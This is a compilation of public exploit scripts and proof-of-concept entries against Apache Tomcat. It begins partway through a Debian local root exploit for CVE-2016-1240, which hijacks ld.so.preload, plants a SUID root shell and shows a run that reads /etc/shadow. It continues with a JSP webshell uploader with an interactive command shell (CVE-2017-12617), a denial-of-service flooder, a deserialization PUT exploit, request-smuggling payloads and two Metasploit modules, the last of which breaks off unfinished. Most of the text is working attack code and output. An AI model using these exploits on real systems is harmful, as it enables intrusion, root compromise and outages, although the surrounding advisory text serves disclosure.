echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
exit 3
fi
# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"
# [ Deferred exploitation ]
# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
echo -e "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
echo -ne "\n you'll be able to add arbitrary commands to the file which will get executed with root privileges"
echo -ne "\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n"
exit 0
fi
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
cleanexit 2
fi
# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)"
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
break;
fi
done
# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null
# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0
--------------[ EOF ]--------------------
Example exploit run:
~~~~~~~~~~~~~~
tomcat7@ubuntu:/tmp$ id
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
tomcat7@ubuntu:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat
ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries
ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine
ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files
tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240
Discovered and coded by:
Dawid Golunski
http://legalhackers.com
[+] Starting the exploit in [active] mode with the following privileges:
uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)
[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out
[+] Compiling the privesc shared library (/tmp/privesclib.c)
[+] Backdoor/low-priv shell installed at:
-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh
[+] Symlink created at:
lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload
[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:
-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload
[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload
[+] The /etc/ld.so.preload file now contains:
/tmp/privesclib.so
[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!
[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh
Please tell me you're seeing this too ;)
[+] Executing the rootshell /tmp/tomcatrootsh now!
tomcatrootsh-4.3# id
uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)
tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# head -n3 /etc/shadow
root:$6$oaf[cut]:16912:0:99999:7:::
daemon:*:16912:0:99999:7:::
bin:*:16912:0:99999:7:::
tomcatrootsh-4.3# exit
exit
[+] Cleaning up...
[+] Job done. Exiting with code 0
VI. BUSINESS IMPACT
-------------------------
Local attackers who have gained access to tomcat user account (for example
remotely via a vulnerable web application, or locally via weak webroot perms),
could escalate their privileges to root and fully compromise the affected system.
VII. SYSTEMS AFFECTED
-------------------------
The following Debian package versions are affected:
Tomcat 8 <= 8.0.36-2
Tomcat 7 <= 7.0.70-2
Tomcat 6 <= 6.0.45+dfsg-1~deb8u1
A more detailed lists of affected packages can be found at:
Debian:
https://security-tracker.debian.org/tracker/CVE-2016-1240
Ubuntu:
http://www.ubuntu.com/usn/usn-3081-1/
Other systmes that use Tomcat packages provided by Debian may also be affected.
VIII. SOLUTION
-------------------------
Debian Security Team was contacted and has fixed affected upstream packages.
Update to the latest tomcat packages provided by your distribution.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
The exploit's sourcecode
http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
CVE-2016-1240
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240
Ubuntu Security Notice USN-3081-1:
http://www.ubuntu.com/usn/usn-3081-1/
Debian Security Advisory DSA-3669-1 (tomcat7):
https://lists.debian.org/debian-security-announce/2016/msg00249.html
https://www.debian.org/security/2016/dsa-3669
Debian Security Advisory DSA-3670-1 (tomcat8):
https://www.debian.org/security/2016/dsa-3670
https://security-tracker.debian.org/tracker/CVE-2016-1240
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
30.09.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
# Exploit Title:Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
# Date: 4th March 2017
# Exploit Author: justpentest
# Vendor Homepage: tomcat.apache.org
# Version: Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6,
8.0.0.RC1 through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47
# Contact: transform2secure@gmail.com
Source: https://www.securityfocus.com/bid/94461/info
1) Description:
Apache Tomcat is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions
and perform unauthorized actions. This may lead to further attacks.
Apache Tomcat 9.0.0.M1 through 9.0.0.M11, 8.5.0 through 8.5.6, 8.0.0.RC1
through 8.0.38, 7.0.0 through 7.0.72 and 6.0.0 through 6.0.47 are
vulnerable.
This could be exploited, in conjunction with a proxy that also permitted
the invalid characters but with a different interpretation, to inject data
into the HTTP response. By manipulating the HTTP response the attacker
could poison a web-cache, perform an XSS attack and/or obtain sensitive
information from requests other then their own.
https://www.securityfocus.com/bid/94461/discuss
2) Exploit:
GET /?{{%25}}cake\=1 HTTP/1.1
Host: justpentest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Cookie:
NSC_MSN-IBNQ-VX-mcwtfswfs=ffffffff091c1daaaa525d5f4f58455e445a4a488888
OR
GET
/?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1
HTTP/1.1
Response will be Apache tomcat front page something like
https://en.wikipedia.org/wiki/File:Apache-tomcat-frontpage-epiphany-browser.jpg
3) Refrences:
https://nvd.nist.gov/vuln/detail/CVE-2016-6816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816
4) Solution:
As usual update ;)
# Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution
# Exploit Author: Al Baradi Joy
# CVE: CVE-2025-24813
# Date: 2025-04-06
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-90.cgi
# Version: Apache Tomcat < 11.0.3 / 10.1.35 / 9.0.98
# Tested on: Apache Tomcat 10.1.33
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-44, CWE-502
# Reference:
https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
import requests
import random
import string
import sys
def rand_filename(length=6):
return ''.join(random.choices(string.ascii_lowercase, k=length))
def generate_payload(interact_url):
# Java serialized payload gadget triggering DNS interaction
return f'\xac\xed\x00\x05...' # Replace with actual gadget bytes or
generator
def exploit(target, interact_url):
filename = rand_filename()
put_url = f"{target}/{filename}.session"
get_url = f"{target}/{filename}"
headers = {
"Content-Range": "bytes 0-452/457",
"Content-Type": "application/octet-stream"
}
payload = generate_payload(interact_url)
print("[+] Exploit for CVE-2025-24813")
print("[+] Made By Al Baradi Joy\n")
print(f"[+] Uploading payload to: {put_url}")
r1 = requests.put(put_url, data=payload, headers=headers)
if r1.status_code == 201:
print("[+] Payload uploaded successfully.")
else:
print(f"[-] Upload failed with status: {r1.status_code}")
return
print(f"[+] Triggering payload via: {get_url}")
cookies = {"JSESSIONID": f".{filename}"}
r2 = requests.get(get_url, cookies=cookies)
print(f"[+] Trigger request sent. Check for DNS callback to:
{interact_url}")
if __name__ == "__main__":
# Display banner first
print("[+] Exploit for CVE-2025-24813")
print("[+] Made By Al Baradi Joy\n")
# Ask the user for the target domain and interact URL
target_url = input("Enter the target domain (e.g., http://localhost:8080):
")
interact_url = input("Enter your interactsh URL: ")
exploit(target_url, interact_url)
# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
import time
import threading
import subprocess
threads = []
def send_payload():
r = remote("localhost", 4000)
while True:
r.send(b"FLT2002" + b"A" * 10000)
for _ in range(5):
new_thread = threading.Thread(target=send_payload)
threads.append(new_thread)
new_thread.start()
for old_thread in threads:
old_thread.join()
#!/usr/bin/python
import requests
import re
import signal
from optparse import OptionParser
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
re=requests.get(str(url)+"/"+str(f), headers=headers)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201:
print ("File Created ..")
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content)
t=removetags(re)
print (t)
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U)
checker="Poc.jsp"
print (bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print (bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else:
print ('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P)
url=str(opt.U)
print ("Uploading Webshell .....")
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print (bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L)
f=open(w,"r")
print ("Scaning hosts in {}".format(w))
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print (str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")
# E-DB Note: https://www.alphabot.com/security/blog/2017/java/Apache-Tomcat-RCE-CVE-2017-12617.html
When running on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request.
This JSP could then be requested and any code it contained would be executed by the server.
The PoC is like this:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
<% out.println("hello");%>
It is the bypass for CVE-2017-12615
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the
enableCmdLineArguments setting is set to true, a remote user can abuse this to execute
system commands, and gain remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yakov Shafranovich', # Original discovery
'sinn3r' # Metasploit module
],
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
[ 'Apache Tomcat 9.0 or prior for Windows', { } ]
],
'References' =>
[
['CVE', '2019-0232'],
['URL', 'https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/'],
['URL', 'https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/']
],
'Notes' =>
{
'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'CmdStagerFlavor' => 'vbs',
'DefaultOptions' =>
{
'RPORT' => 8080
},
'Privileged' => false,
'DisclosureDate' => 'Apr 10 2019', # Date of public advisory issued by the vendor
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to CGI script', '/'])
])
register_advanced_options(
[
OptBool.new('ForceExploit', [false, 'Override check result', false])
])
deregister_options('SRVHOST', 'SRVPORT', 'URIPATH')
end
def check
sig = Rex::Text.rand_text_alpha(10)
uri = normalize_uri(target_uri.path)
uri << "?&echo+#{sig}"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
vprint_error('No Response from server')
return CheckCode::Unknown
end
if res.body.include?(sig)
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def execute_command(cmd, opts={})
# Our command stager assumes we have access to environment variables.
# We don't necessarily have that, so we have to modify cscript to a full path.
cmd.gsub!('cscript', 'C:\\Windows\\System32\\cscript.exe')
uri = normalize_uri(target_uri.path)
uri << "?&#{CGI.escape(cmd)}"
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
unless res
fail_with(Failure::Unreachable, 'No response from server')
end
unless res.code == 200
fail_with(Failure::Unknown, "Unexpected server response: #{res.code}")
end
end
# it seems we don't really have a way to retrieve the filenames from the VBS command stager,
# so we need to rely on the user to cleanup the files.
def on_new_session(cli)
print_warning('Make sure to manually cleanup the exe generated by the exploit')
super
end
def exploit
print_status("Checking if #{rhost} is vulnerable")
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning('Target does not appear to be vulnerable.')
end
print_status("#{rhost} seems vulnerable, what a good day.")
execute_cmdstager(flavor: :vbs, temp: '.', linemax: 7000)
end
end
require "msf/core"
class MetasploitModule < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
"Name" => "Ghostcat",
"Description" => %q{
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
},
"Author" =>
[
"A Security Researcher of Chaitin Tech", #POC
"ThienNV - SunCSR" #Metasploit Module
],
"License" => MSF_LICENSE,
"References" =>
[
[ "CVE", "2020-1938"]
],
"Privileged" => false,
"Platform" => %w{ java linux win},
"Targets" =>
[
["Automatic",
{
"Arch" => ARCH_JAVA,
"Platform" => "win"
}
],
[ "Java Windows",
{
"Arch" => ARCH_JAVA,
"Platform" => "win"
}
],
[ "Java Linux",
{
"Arch" => ARCH_JAVA,
"Platform" => "linux"
}
]
],
"DefaultTarget" => 0))
register_options(
[
OptString.new("FILENAME",[true,"File name","/WEB-INF/web.xml"]),
OptBool.new('SSL', [ true, 'SSL', false ]),
OptPort.new('PORTWEB', [ false, 'Set a port webserver'])
],self.class)
end
def method2code(method)
methods = {
"OPTIONS" => 1,
"GET" => 2,
"HEAD" => 3,
"POST" => 4,
"PUT" => 5,
"DELETE" => 6,
"TRACE" => 7,
"PROPFIND" => 8
}
code = methods[method]
return code
end
def make_headers(headers)
header2code = {
"accept" => "\xA0\x01",
"accept-charset" => "\xA0\x02",
"accept-encoding" => "\xA0\x03",
"accept-language" => "\xA0\x04",
"authorization" => "\xA0\x05",
"connection" => "\xA0\x06",
"content-type" => "\xA0\x07",
"content-length" => "\xA0\x08",
"cookie" => "\xA0\x09",
"cookie2" => "\xA0\x0A",
"host" => "\xA0\x0B",
"pragma" => "\xA0\x0C",
"referer" => "\xA0\x0D",
"user-agent" => "\xA0\x0E"
}
headers_ajp = Array.new
for (header_name, header_value) in headers do
code = header2code[header_name].to_s
if code != ""
headers_ajp.append(code)
headers_ajp.append(ajp_string(header_value.to_s))
else
headers_ajp.append(ajp_string(header_name.to_s))
headers_ajp.append(ajp_string(header_value.to_s))
end
end
return int2byte(headers.length,2), headers_ajp
end
def make_attributes(attributes)
attribute2code = {
"remote_user" => "\x03",
"auth_type" => "\x04",
"query_string" => "\x05",
"jvm_route" => "\x06",
"ssl_cert" => "\x07",
"ssl_cipher" => "\x08",
"ssl_session" => "\x09",
"req_attribute" => "\x0A",
"ssl_key_size" => "\x0B"
}
attributes_ajp = Array.new
for attr in attributes
name = attr.keys.first.to_s
code = (attribute2code[name]).to_s
value = attr[name]
if code != ""
attributes_ajp.append(code)
if code == "\x0A"
for v in value
attributes_ajp.append(ajp_string(v.to_s))
end
else
attributes_ajp.append(ajp_string(value.to_s))
end
end
end
return attributes_ajp
end
def ajp_string(message_bytes)
message_len_int = message_bytes.length
return int2byte(message_len_int,2) + message_bytes + "\x00"
end
def int2byte(data, byte_len=1)
if byte_len == 1
return [data].pack("C")
else
return [data].pack("n*")
end
end
def make_forward_request_package(method,headers,attributes)
prefix_code_int = 2
prefix_code_bytes = int2byte(prefix_code_int)
method_bytes = int2byte(method2code(method))
protocol_bytes = "HTTP/1.1"
req_uri_bytes = "/index.txt"
remote_addr_bytes = "127.0.0.1"
remote_host_bytes = "localhost"
server_name_bytes = datastore['RHOST'].to_s
if datastore['SSL'] == true
is_ssl_boolean = 1
else
is_ssl_boolean = 0
end
server_port_int = datastore['PORTWEB']
if server_port_int.to_s == ""
server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
end
is_ssl_bytes = int2byte(is_ssl_boolean,1)
server_port_bytes = int2byte(server_port_int, 2)
headers.append(["host", "#{server_name_bytes}:#{server_port_int}"])
num_headers_bytes, headers_ajp_bytes = make_headers(headers)
attributes_ajp_bytes = make_attributes(attributes)
message = Array.new
message.append(prefix_code_bytes)
message.append(method_bytes)
message.append(ajp_string(protocol_bytes.to_s))
message.append(ajp_string(req_uri_bytes.to_s))
message.append(ajp_string(remote_addr_bytes.to_s))
message.append(ajp_string(remote_host_bytes.to_s))
message.append(ajp_string(server_name_bytes.to_s))
message.append(server_port_bytes)
message.append(is_ssl_bytes)
message.append(num_headers_bytes)
message += headers_ajp_bytes
message += attributes_ajp_bytes
message.append("\xff")
message_bytes = message.join
send_bytes = "\x12\x34" + ajp_string(message_bytes.to_s)
return send_bytes
end
def send_recv_once(data)
buf = ""
begin
connect(true, {'RHOST'=>"#{datastore['RHOST'].to_s}", 'RPORT'=>datastore['RPORT'].to_i, 'SSL'=>datastore['SSL']})
sock.put(data)
buf = sock.get_once || ""
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
ensure
disconnect
end
return buf
end
def read_buf_string(buf, idx)
len = buf[idx..(idx+2)].unpack('n')[0]
idx += 2
print "#{buf[idx..(idx+len)]}"
idx += len + 1
idx
end
def parse_response(buf, idx)
common_response_headers = {
"\x01" => "Content-Type",
"\x02" => "Content-Language",
"\x03" => "Content-Length",
"\x04" => "Date",
"\x05" => "Last-Modified",
"\x06" => "Location",
"\x07" => "Set-Cookie",
"\x08" => "Set-Cookie2",
"\x09" => "Servlet-Engine",
"\x0a" => "Status",
"\x0b" => "WWW-Authenticate",
}
idx += 2
idx += 2
if buf[idx] == "\x04"
idx += 1
print "Status Code: "
idx += 2
idx = read_buf_string(buf, idx)
puts
header_num = buf[idx..(idx+2)].unpack('n')[0]
idx += 2
for i in 1..header_num
if buf[idx] == "\xA0"
idx += 1
print "#{common_response_headers[buf[idx]]}: "
idx += 1
idx = read_buf_string(buf, idx)
puts
else
idx = read_buf_string(buf, idx)
print(": ")
idx = read_buf_string(buf, idx)
puts
end
end
elsif buf[idx] == "\x05"
return 0
elsif buf[idx] == "\x03"
idx += 1
puts
idx = read_buf_string(buf, idx)
else
return 1
end
parse_response(buf, idx)
end
def run
